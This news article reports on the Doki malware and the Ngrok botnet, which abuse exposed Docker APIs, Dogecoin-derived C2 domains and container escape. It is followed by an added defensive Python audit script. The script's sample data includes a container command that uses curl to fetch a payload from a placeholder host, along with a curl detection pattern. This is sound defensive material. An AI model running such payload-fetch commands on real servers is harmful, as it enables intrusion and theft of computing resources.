
'Doki' malware attacks Docker servers using Dogecoin

Misconfigured Docker API ports are being scanned and exploited by a threat that's evolved from the Ngrok Botnet campaign

A graphic of the Doge cryptocurrency

Malware that has remained undetected for six months is exploiting misconfigured Docker API ports to launch malicious payloads, while abusing the Dogecoin cryptocurrency blockchain in the process.

The malware, known as ‘Doki’, is targeting misconfigured containerised environments hosted on Azure, AWS, and a number of other major cloud platforms, according to Intezer researchers, with attackers able to find publicly accessible Docker API ports and exploit them to establish their own containers.

Doki is then able to install malware on the targeted infrastructure based on code received from its operators, spawning and deleting containers in the process.

Doki serves as an undetectable Linux backdoor, and represents an evolution of the two-year-old Ngrok Botnet campaign. Alarmingly, it has also managed to evade every one of the 60 antivirus engines listed on VirusTotal since it was first analysed in January 2020.

This particular strain is unusual in the sense that it abuses the Dogecoin cryptocurrency blockchain in order to attack these containerised environments. The attackers use a fairly ingenious method to prevent the botnet infrastructure from being taken down, which involves dynamically changing the command and control (C2) server's domain based on the transactions recorded on a Dogecoin wallet.

The C2 domain address, from which the payload is sent, changes based on the amount of Dogecoin in the wallet at any given time. When Dogecoin is added to or removed from the wallet, the system encodes the transaction and derives a new unique address from which the attackers can control the Doki malware.

Because of the secure and decentralised nature of the blockchain, this infrastructure can't be taken down by law enforcement, and new addresses can't be pre-empted by third parties, as only the attackers can make transactions from their Dogecoin wallet.

“Linux threats are becoming more common. A contributing factor to this is the increasing shift and reliance on cloud environments, which are mostly based on Linux infrastructure,” said researchers Nicole Fishbein and Michael Kajiloti. “Hence, attackers have been adapting accordingly with new tools and techniques designed specifically for this infrastructure.”

Historically, the Ngrok Botnet has been one of the most prevalent threats abusing misconfigured Docker API ports in this way to execute malware, they added. As part of the attack, the hackers would abuse Docker configuration features to elude container restrictions and execute various payloads from the host.

Such threats also deploy network scanners to identify the cloud providers’ IP ranges for additional potentially vulnerable targets. What makes it so dangerous is that it only takes a few hours from when a misconfigured Docker server is online to become infected.

Meanwhile, because the cryptocurrency blockchain the hackers abuse is immutable and decentralised, Fishbein and Kajiloti added, the method is resistant to infrastructure takedowns as well as domain filtering attempts.

Hackers can create any container as part of the attack, and execute code from the host machine by exploiting a container escape method. This is based on creating a new container, which is achieved by posting a ‘create’ API request.

Each container is based on an Alpine image with curl installed, which isn't malicious in and of itself; rather, it's abused to execute the attack through curl commands that run as soon as the container is up.


Hackers then abuse the Ngrok service, which provides secure tunnels connecting local servers to the public internet, to craft unique, short-lived URLs, using them to download payloads during the attack by passing them to the curl-based image.

“The Ngrok Botnet campaign has been ongoing for over two years and is rather effective, infecting any misconfigured Docker API server in a matter of hours,” added Nicole Fishbein and Michael Kajiloti. “The incorporation of the unique and undetected Doki malware indicates the operation is continuing to evolve.

“This attack is very dangerous due to the fact the attacker uses container escape techniques to gain full control of the victim’s infrastructure. Our evidence shows that it takes only a few hours from when a new misconfigured Docker server is up online to become infected by this campaign.”

The researchers recommend that both companies and individuals who own cloud-based container servers immediately fix their configuration settings to prevent exposure to the threat. This process includes checking for any exposed ports, verifying there are no foreign or unknown containers among existing containers, and monitoring for excessive use of computing resources.
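The three checks the researchers recommend can be scripted. The following is an added example written for this article, not code from IT Pro or from Intezer's research: it parses text in the shape that `ss -ltn`, `docker ps --format` and `docker stats --no-stream --format` print, flags a Docker API socket bound to a non-loopback address, lists containers whose image is not on an allowlist (noting the Alpine-plus-curl pattern the article describes), and reports containers above a CPU threshold. The allowlist, threshold, and all sample lines are constructed for offline testing; the ports 2375 and 2376 are Docker's own well-known defaults for the plain and TLS remote API and do not come from the article.

```python
"""Added defender-side example (not from the IT Pro article or Intezer's research).

Implements the three recommended checks: exposed Docker API ports, unknown
containers, and excessive resource use. All sample input below is constructed.
"""
import re

# Docker's default TCP ports for the remote API (2375 plain, 2376 TLS).
# These are well-known Docker defaults, not values taken from the article.
DOCKER_API_PORTS = {2375, 2376}

# Constructed sample of `ss -ltn` output (not captured from a real host).
SAMPLE_SS = """\
State   Recv-Q  Send-Q  Local Address:Port  Peer Address:Port
LISTEN  0       128     0.0.0.0:22          0.0.0.0:*
LISTEN  0       4096    0.0.0.0:2375        0.0.0.0:*
LISTEN  0       4096    127.0.0.1:2376      0.0.0.0:*
"""

# Constructed sample of `docker ps --format '{{.ID}}\t{{.Image}}\t{{.Command}}'`.
# The URL is a placeholder in the reserved .invalid domain.
SAMPLE_PS = """\
a1b2c3d4e5f6\tnginx:1.21\t"nginx -g 'daemon off;'"
0f9e8d7c6b5a\talpine\t"sh -c 'curl -sO http://placeholder.invalid/payload'"
1122334455aa\tpostgres:14\t"docker-entrypoint.sh postgres"
"""

# Constructed sample of `docker stats --no-stream --format '{{.ID}}\t{{.CPUPerc}}'`.
SAMPLE_STATS = """\
a1b2c3d4e5f6\t0.35%
0f9e8d7c6b5a\t398.12%
1122334455aa\t2.10%
"""

ALLOWED_IMAGES = {"nginx:1.21", "postgres:14"}  # hypothetical allowlist
CPU_ALERT_PERCENT = 90.0                          # hypothetical threshold


def exposed_api_sockets(ss_output):
    """Return (address, port) pairs where a Docker API port listens on a non-loopback address."""
    found = []
    for line in ss_output.splitlines()[1:]:  # skip the header row
        parts = line.split()
        if len(parts) < 4 or parts[0] != "LISTEN":
            continue
        addr, _, port = parts[3].rpartition(":")  # handles "[::]:2375" as well
        if int(port) in DOCKER_API_PORTS and not addr.startswith("127.") and addr != "[::1]":
            found.append((addr, int(port)))
    return found


def unknown_containers(ps_output, allowed=ALLOWED_IMAGES):
    """Flag containers whose image is not on the allowlist, with a reason string."""
    flagged = []
    for line in ps_output.splitlines():
        cid, image, command = line.split("\t", 2)
        if image in allowed:
            continue
        reason = "image not on allowlist"
        # The article reports Alpine images with curl being used to fetch payloads.
        if image.split(":")[0] == "alpine" and re.search(r"\bcurl\b", command):
            reason += "; alpine image running curl (pattern reported for the Ngrok/Doki campaign)"
        flagged.append((cid, image, reason))
    return flagged


def hot_containers(stats_output, threshold=CPU_ALERT_PERCENT):
    """Return container IDs whose CPU use exceeds the threshold (excessive resource use)."""
    hot = []
    for line in stats_output.splitlines():
        cid, cpu = line.split("\t")
        if float(cpu.rstrip("%")) > threshold:
            hot.append(cid)
    return hot


def audit(ss_output=SAMPLE_SS, ps_output=SAMPLE_PS, stats_output=SAMPLE_STATS):
    """Run all three checks and return the findings as a dict."""
    return {
        "exposed_api": exposed_api_sockets(ss_output),
        "unknown_containers": unknown_containers(ps_output),
        "hot_containers": hot_containers(stats_output),
    }


if __name__ == "__main__":
    for key, value in audit().items():
        print(f"{key}: {value}")
```

On a real host, replace the three sample strings with the output of the corresponding commands (for example via `subprocess.run`) and feed the findings to whatever alerting the team already uses; a Docker API socket reachable on 0.0.0.0 is the condition the article says leads to infection within hours, so that finding deserves the highest priority.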
